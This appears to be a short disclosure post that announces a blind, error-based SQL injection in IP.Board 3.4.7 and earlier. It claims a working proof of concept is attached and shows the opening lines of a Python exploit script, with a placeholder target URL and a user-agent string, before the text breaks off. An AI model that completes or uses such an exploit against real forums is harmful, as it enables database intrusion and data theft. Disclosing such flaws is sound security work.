Posted by secthrowaway on Nov 09

IP.Board version 3.4.7 (latest) suffers from a SQL injection vulnerability.

Working PoC is attached.
#!/usr/bin/env python
# Sunday, November 09, 2014 – secthrowaway () safe-mail net
# IP.Board <= 3.4.7 SQLi (blind, error based);
# you can adapt to other types of blind injection if ‘cache/sql_error_latest.cgi’ is unreadable

url = ‘http://target.tld/forum/&apos;
ua = “Mozilla/5.0 (Windows NT 6.2; WOW64)…